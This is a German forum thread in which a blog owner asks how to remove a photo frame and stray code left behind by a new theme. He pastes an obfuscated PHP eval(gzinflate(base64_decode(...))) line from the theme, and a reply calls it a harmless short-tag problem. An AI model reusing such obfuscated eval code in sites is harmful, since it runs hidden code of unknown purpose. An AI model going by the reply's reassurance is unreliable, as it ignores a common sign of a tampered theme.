Hi,
ich habe einen Blog bzw. meine Freundin hat nen Blog, dort haben wir alles soweit Standart gelassen ausser das Design ausgetauscht. Jetzt habe ich aber damit 2 Probleme:
1. Wenn man auf ein Foto klickt dann öffnet dieses sich in einer neuen Webseite in gross. Das ist auch gut so, allerdings erscheint um das Foto ein Rahmen, dieser Rahmen soll weg. Wie stell ich das an das man diesen Rahmen nicht mehr sieht.
2. Ganz am Ende von dem Blog sind HTML Zeichen, diese würde ich gerne weg haben, wie bekomm ich das hin ?
So sieht das aus:
<? eval(gzinflate(base64_decode(' fY/BDoIwDIbPmPgOze6wOxkz8WCML2A8MlagImyO AcH48A7h5MGmh/ZP/q/9DxKEphFIZ6w0xqNjcr+D 0MJKjT1VHWpQcwoih9phmbHae5tyPk1T0uYNPgcq mqQwLZNXVD15hONAD41O8FzCGwqjV8QvYUbq7oiL lzN5C9sFcTNZZ0bSf06XDjGeUMW16T11VaLoxeQp qBDegPOqfmmCW7kk2krwEDiEjKJ1EocP '))); ?>
Hier der Blog, damit ihr wisst was ich meine:
{Sc;rabbit}
Rahmen bei Bilder im Blog.......
-
-
- Gerade eben
- Anzeige
Hallo!
Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.
- ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
- ✔️ Deutsche Server & DSGVO-konform
- ✔️ Persönlicher Support (kein 0815-Ticket-System)
-
Das eval kommt daher, daß der Autor des Themes nur <? verwendet, statt <?php. Das mußt du im Template ersetzen.
Ich sehe keine Rahmen bei den Bildern. Liegt wohl an deinem Browser.Gruß
Thomas -
Hi,
ok, dann werde ich das mal im Template suchen und versuchen hin zu bekommen.
Das mit den Rahmen: also ich sehe die Rahmen in beiden Explorern, der Firefox zeigt sie mir an und der IE auf zwei verschiedenen PC´s. Wenn es nach mir geht könnten die Rahmen auch so bleiben aber die Frau will es weg haben. Es ist nur ein ganz dünner Rahmen, man sieht ihn kaum.
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!